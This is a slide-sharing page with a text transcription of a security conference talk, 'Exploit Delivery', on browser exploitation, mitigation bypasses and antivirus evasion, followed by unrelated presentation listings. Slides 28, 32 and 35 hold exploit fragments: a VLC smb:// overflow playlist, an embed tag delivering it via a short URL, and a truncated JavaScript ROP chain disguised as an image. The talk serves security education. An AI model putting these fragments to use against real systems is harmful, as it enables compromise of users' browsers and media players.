delivery
play

DELIVERY l i m u a S h a h S 0 1 0 2 U L k . c a - PowerPoint PPT Presentation

Jan 31, 2024 •626 likes •1.01k views

Hi! Your exploits have arrived. EXPLOIT DELIVERY l i m u a S h a h S 0 1 0 2 U L k . c a H net-square # who am i Saumil Shah, CEO Net-square LinkedIn: saumilshah net-square The Web Has Evolved "The amount of

  1. Hi! Your exploits have arrived. EXPLOIT DELIVERY l i m u a S h a h S 0 1 0 2 U L k . c a H net-square

  2. # who am i • Saumil Shah, CEO Net-square • LinkedIn: saumilshah net-square

  3. The Web Has Evolved "The amount of intelligence in the world is constant. And the population is increasing." net-square

  4. Browser Death of Wars Standards HTTP HTML? +0.1 net-square

  5. THE WEB WE LIVE IN 5 net-square

  6. Wider Attack Surface 5 net-square

  7. Ease of Exploitation 5 net-square

  8. Mass Manufacturing 5 e d i w d l r o W , e g a r e v o c r u o y s e d i H . s k c a r t net-square

  9. Complexity... 5 ...as never seen before! net-square

  10. A New Dimension! 5 GUARANTEED!! Fresh new bugs, Present on most computers net-square

  11. Exploit Mitigation Techniques net-square

  12. /GS SafeSEH DEP ASLR Permanent DEP ASLR and DEP net-square

  13. /GS SEH overwrites SafeSEH non-SEH DLLs Return to LibC DEP Heap Sprays ASLR Permanent DEP ROP JIT Sprays ASLR and DEP net-square

  14. I can haz sandbox I Also Can! net-square

  15. Sploit Time! IM IN UR BASE KILLING UR D00DZ net-square

  16. See no EVAL CVE 2010-2883 (0+10) day exploit Obfuscated Javascript decoded without using eval, document.write, etc. net-square

  17. Who you gonna call? net-square

  18. howstuffworks - Anti Virus YER NOT ON THE LIST! COME ON IN. net-square

  19. howstuffworks - Anti Virus These are not the sploitz you're looking for. net-square

  20. 0-day to the Face! "To get our new signature files you need a valid support plan." net-square

  21. ...and keep on patching net-square

  22. Jedi Web Tricks Scripts Clever Short.nr without HTML5 JS scripts net-square

  23. W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6 th October 2010] net-square

  24. We Broked Teh Webz! HTML HTTP Standards... Old and idiotic What Standards? Object JS too SRC= Stateless No Auth Bursty access powerful net-square

  25. The Web Application at present Delivery HTTP AJAX Authentication HTML Flash Statefulness Sandbox Data Typing HTML5 Non-mutable Anti-XSS WAF Silverlight Web sockets MIND THE GAP net-square

  26. Sploit Time! net-square

  27. smb:// mrl buffer overflow net-square

  28. VLC smb:// overflow - playlist <?xml version="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList> </playlist> net-square

  29. net-square

  30. Tiny Alpha ZOMFG Encoded URL Exploit net-square

  31. 100% Pure Alphanum! net-square

  32. VLC smb overflow - HTMLized!! <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf http://tinyurl.com/ycctrzf" id="vlc" /> I'm in ur browser.... pwn ...blowin up ur g00dz net-square

  33. This iz what ? net-square

  34. I'm an evil Javascript I'm an innocent image net-square

  35. function packv(n){var s=new Number(n).toString (16);while(s.length<8)s="0"+s;return(unescape ("%u"+s.substring(4,8)+"%u"+s.substring (0,4)))}var addressof=new Array();addressof ["ropnop"]=0x6d81bdf0;addressof ["xchg_eax_esp_ret"]=0x6d81bdef;addressof ["pop_eax_ret"]=0x6d906744;addressof ["pop_ecx_ret"]=0x6d81cd57;addressof ["mov_peax_ecx_ret"]=0x6d979720;addressof ["mov_eax_pecx_ret"]=0x6d8d7be0;addressof ["mov_pecx_eax_ret"]=0x6d8eee01;addressof ["inc_eax_ret"]=0x6d838f54;addressof ["add_eax_4_ret"]=0x00000000;addressof ["call_peax_ret"]=0x6d8aec31;addressof ["add_esp_24_ret"]=0x00000000;addressof ["popad_ret"]=0x6d82a8a1;addressof ["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory (baseptr,size,callnum){var ropnop=packv (addressof["ropnop"]);var pop_eax_ret=packv (addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof ["pop_ecx_ret"]);var mov_peax_ecx_ret=packv (addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof ["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof ["mov_pecx_eax_ret"]);var call_peax_ret=packv (addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof ["add_esp_24_ret"]);var popad_ret=packv (addressof["popad_ret"]);var retval="" <CANVAS> net-square

  36. The Solution? HTML 8.0 Browser Security Model HTTP 2.0 Self Contained Apps net-square

  37. kthxbai www.net-square.com secure . automate . innovate net-square

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Clean Delivery Kit: A job aid Linda Bruce, PATH 1 What are Delivery What are Delivery Kits?

Clean Delivery Kit: A job aid Linda Bruce, PATH 1 What are Delivery What are Delivery Kits?

Clean Delivery Kit: A job aid Linda Bruce, PATH 1 What are Delivery What are Delivery Kits? Kits? Delivery kits are pre- packaged, single- use, disposable kits that contain essential items for conducting a clean delivery. 2 WHOs

532 views • 9 slides
Service Delivery An overview of Service Delivery related to the 2008 Service Delivery Agreement,

Service Delivery An overview of Service Delivery related to the 2008 Service Delivery Agreement,

Service Delivery An overview of Service Delivery related to the 2008 Service Delivery Agreement, Items Presented, and the Bill Slaughter , Chairman Joyce E. Evans , Vice Chairman Term of the Existing Commissioner, District 1 Scott Orenstein ,

620 views • 30 slides
July 16, 2014 What is an Organized Delivery System? An Organized Delivery System (ODS) is a

July 16, 2014 What is an Organized Delivery System? An Organized Delivery System (ODS) is a

What is an Organized Delivery System (ODS) from a Filing and Legal Perspective? Presented By: Kevin Joyce: VP, Network &amp; Delivery Systems, QualCare, Inc. Carol Grelecki: Esq, Brach Eichler, LLC July 16, 2014 What is an Organized Delivery

650 views • 19 slides
PROGRESSIVE DELIVERY PROGRESSIVE DELIVERY CONTINUOUS DELIVERY THE RIGHT WAY CONTINUOUS DELIVERY

PROGRESSIVE DELIVERY PROGRESSIVE DELIVERY CONTINUOUS DELIVERY THE RIGHT WAY CONTINUOUS DELIVERY

PROGRESSIVE DELIVERY PROGRESSIVE DELIVERY CONTINUOUS DELIVERY THE RIGHT WAY CONTINUOUS DELIVERY THE RIGHT WAY Carlos Sanchez / csanchez.org @csanchez / PROGRESSIVE PROGRESSIVE DELIVERY DELIVERY Progressive Delivery is a term that

561 views • 41 slides
DIO TFM Presentation DIO TFM Service Delivery DIO TFM Service Delivery Background The DIO

DIO TFM Presentation DIO TFM Service Delivery DIO TFM Service Delivery Background The DIO

DIO TFM Presentation DIO TFM Service Delivery DIO TFM Service Delivery Background The DIO was created on 1 April 2011 following the Strategic Defence Review by Lord Levene. His recommendations led to the MOD being reformed to become more

636 views • 20 slides
Express Delivery Chairs 4 weeks New Express Delivery 4 week for delivery Newland Ledbury

Express Delivery Chairs 4 weeks New Express Delivery 4 week for delivery Newland Ledbury

Express Delivery Chairs 4 weeks New Express Delivery 4 week for delivery Newland Ledbury Ashwell Farley Standard Any Cintique fabric Lifetime Guarantee Eton Standard Chair and the Cheshire chair are also available on Express

193 views • 7 slides
Delivery Scott Kennelly Senior Project Manager Asset Delivery Services Project Delivery

Delivery Scott Kennelly Senior Project Manager Asset Delivery Services Project Delivery

June 2010 Delivery Scott Kennelly Senior Project Manager Asset Delivery Services Project Delivery Delivery by a two stream approach Early &amp; Enabling Works Operator Franchise Works The Early &amp; Enabling Works is carried

488 views • 19 slides
Trial of Labor after Cesarean I have not had a cesarean delivery Delivery: Which Patients?

Trial of Labor after Cesarean I have not had a cesarean delivery Delivery: Which Patients?

6/6/2014 Disclosures Trial of Labor after Cesarean I have not had a cesarean delivery Delivery: Which Patients? Which I do not get paid more money for doing Hospitals? cesarean deliveries I did help write ACOG PB #115 Jeffrey L

371 views • 16 slides
Delivery Financial in 2019 Framework

Delivery Financial in 2019 Framework

Delivery Financial in 2019 Framework Delivery Portfolio &amp; projects delivery Delivery Financial in 2017- Framework 2019 Delivery

557 views • 23 slides
XPS Delivery Logistics XPS Delivery &amp; Logistics Company is established in London / UK by

XPS Delivery Logistics XPS Delivery &amp; Logistics Company is established in London / UK by

XPS Delivery Logistics XPS Delivery &amp; Logistics Company is established in London / UK by professional team of 45 years experience. Innovative intuition we have combined our experience with the next generation technologies embedded with the

168 views • 12 slides
Expediting Project Delivery Webinar Agency Commitments to Internal Coordination and Delivery

Expediting Project Delivery Webinar Agency Commitments to Internal Coordination and Delivery

Expediting Project Delivery Webinar Agency Commitments to Internal Coordination and Delivery October 16, 2017 Kate Kurgan, AASHTO David Williams, FHWA Elisha Wright-Kehner, Arkansas DOT Paul OBrien, Arizona DOT SHRP2 &amp; Its Focus

689 views • 49 slides
PREACHING MASTERCLASS Delivery Delivery Write out a full manuscript Helps you to think

PREACHING MASTERCLASS Delivery Delivery Write out a full manuscript Helps you to think

PREACHING MASTERCLASS Delivery Delivery Write out a full manuscript Helps you to think logically Helps you to identify clear point that runs from start to finish Helps you to become intimately familiar with your material so you

551 views • 10 slides
Local Delivery Pilots it has to be different Chris Perks Executive Director Local Delivery 30

Local Delivery Pilots it has to be different Chris Perks Executive Director Local Delivery 30

Local Delivery Pilots it has to be different Chris Perks Executive Director Local Delivery 30 th January 2019 What t do we want t life e to be like e for our people? ple? SOCIAL &amp; PHYSICAL MENTAL INDIVIDUAL ECONOMIC COMMUNITY

520 views • 13 slides
Who is is a drone delivery service. Flirteys mission is to save lives &amp; improve

Who is is a drone delivery service. Flirteys mission is to save lives &amp; improve

Who is is a drone delivery service. Flirteys mission is to save lives &amp; improve lifestyles by making delivery instant for everyone Flirtey has offices in Reno, Nevada and has built safe drone delivery and logistics technology by

364 views • 10 slides
Expediting Project Delivery Webinar Improving Project Delivery Outcomes in Documentation and

Expediting Project Delivery Webinar Improving Project Delivery Outcomes in Documentation and

Expediting Project Delivery Webinar Improving Project Delivery Outcomes in Documentation and Construction November 15, 2017 Kate Kurgan, AASHTO Carlos Figueroa, FHWA David Williams, FHWA Michael Smelker, New Mexico DOT Laura Stone,

740 views • 63 slides
Delivery Group 2 1 Nov 1 9 Ofgem Delivery Group m eeting agenda Objective of todays

Delivery Group 2 1 Nov 1 9 Ofgem Delivery Group m eeting agenda Objective of todays

Delivery Group 2 1 Nov 1 9 Ofgem Delivery Group m eeting agenda Objective of todays session : General update on the project since the last time we met and next steps Overview of the 2 nd working paper I tem Tim ing

1.01k views • 61 slides
Fast Delivery Adrian Cockcroft @adrianco Technology Fellow - Battery Ventures September 2014

Fast Delivery Adrian Cockcroft @adrianco Technology Fellow - Battery Ventures September 2014

Fast Delivery Adrian Cockcroft @adrianco Technology Fellow - Battery Ventures September 2014 Typical reactions to my Netflix talks Typical reactions to my Netflix talks You guys are crazy! Cant believe it 2009 Typical

1.22k views • 101 slides
CS599: Convex and Combinatorial Optimization Fall 2013 Lecture 16: Combinatorial Problems as

CS599: Convex and Combinatorial Optimization Fall 2013 Lecture 16: Combinatorial Problems as

CS599: Convex and Combinatorial Optimization Fall 2013 Lecture 16: Combinatorial Problems as Linear Programs II Instructor: Shaddin Dughmi Announcements Project announced Choose a topic and partner(s) by Nov 1 Choose papers by Nov 8 Short

679 views • 44 slides
xtdpdqml: Quasi-maximum likelihood estimation of linear dynamic short-T panel data models

xtdpdqml: Quasi-maximum likelihood estimation of linear dynamic short-T panel data models

Introduction Dynamic panel data model Stata syntax Example Conclusion xtdpdqml: Quasi-maximum likelihood estimation of linear dynamic short-T panel data models Sebastian Kripfganz University of Exeter Business School, Department of

560 views • 27 slides
Creating statistics e-Assessments using DEWIS with embedded R code Iain Weir, Rhys Gwynllyw &amp;

Creating statistics e-Assessments using DEWIS with embedded R code Iain Weir, Rhys Gwynllyw &amp;

Creating statistics e-Assessments using DEWIS with embedded R code Iain Weir, Rhys Gwynllyw &amp; Karen Henderson In the beginning (2013-4). Level 2 research skills module delivered to 850+ Business School Students Short course

458 views • 25 slides
THE ACADEMY OF FINANCIAL MARKETS WELCOME TO THE PRESENTATION! Thought for the day When the

THE ACADEMY OF FINANCIAL MARKETS WELCOME TO THE PRESENTATION! Thought for the day When the

2013/04/24 THE ACADEMY OF FINANCIAL MARKETS WELCOME TO THE PRESENTATION! Thought for the day When the OUTLOOK is not good; try looking UP. Risk Management and hedging What is risk and what do you do with risk in a business? Transfer

218 views • 7 slides
Community of Interest (on Future Scientific Methodologies) Curated Unconference Richard Carlson

Community of Interest (on Future Scientific Methodologies) Curated Unconference Richard Carlson

Community of Interest (on Future Scientific Methodologies) Curated Unconference Richard Carlson ASCR Program Manager Richard.Carlson@science.doe.gov Welcome Purpose This curated unconference is focused on you and your peers putting aside

318 views • 9 slides
Some Motivating Facts Nelson Mark University of Notre Dame and NBER Asset Pricing Course (Mark)

Some Motivating Facts Nelson Mark University of Notre Dame and NBER Asset Pricing Course (Mark)

Some Motivating Facts Nelson Mark University of Notre Dame and NBER Asset Pricing Course (Mark) Some Motivating Facts January 16, 2018 1 / 10 Equity and T-Bill Cumulated Returns (Mark) Some Motivating Facts January 16, 2018 2 / 10

380 views • 10 slides
A practical approach to detect turn to turn shorts during superconductive magnet fabrication

A practical approach to detect turn to turn shorts during superconductive magnet fabrication

Introduction CLAS12 turn to turn short detector High resolution DC resistance A practical approach to detect turn to turn shorts during superconductive magnet fabrication Giovanni Gabrielli Supervisor: Luciano Elementi Coordinator: Emanuela

1.05k views • 62 slides

More recommend